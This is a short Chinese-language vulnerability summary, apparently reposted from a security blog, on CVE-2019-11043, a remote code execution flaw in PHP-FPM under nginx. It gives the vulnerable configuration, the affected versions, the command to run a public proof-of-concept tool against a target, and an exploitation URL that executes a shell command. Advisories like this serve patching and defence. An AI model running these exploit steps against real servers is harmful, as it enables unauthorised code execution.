应用安全 - 编程语言漏洞 - PHP语言漏洞汇总

Posted 2021-03-25 atesetenginner

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了应用安全 - 编程语言漏洞 - PHP语言漏洞汇总相关的知识，希望对你有一定的参考价值。

CVE-2019-11043

Date：
2019.9.16

类型：
远程代码执行

前置条件：

nginx + fastcgi + php-fpm

配置文件信息如下：
location ~ [^/].php(/|$) {
  ...
  fastcgi_split_path_info ^(.+?.php)(/.*)$;
  fastcgi_param PATH_INFO       $fastcgi_path_info;
  fastcgi_pass   php:9000;
  ...
}

影响范围：
version>php 7, php5(EXP暂无)

PoC:
https://github.com/neex/phuip-fpizdam
go run . "http://ip:8080/index.php"

ExP:
http://ip:8080/index.php?a=id

以上是关于应用安全 - 编程语言漏洞 - PHP语言漏洞汇总的主要内容，如果未能解决你的问题，请参考以下文章

应用安全 - 工具 | 框架 - SharePoint - 漏洞 - 汇总

网络安全入门大总结—Java语言中常用的渗透漏洞大汇总

PHP输入验证安全漏洞预警

应用安全 - PHPCMS - Joomla漏洞汇总

PHP现反序列化漏洞或使WordPress遭远程攻击

php安全漏洞怎么修复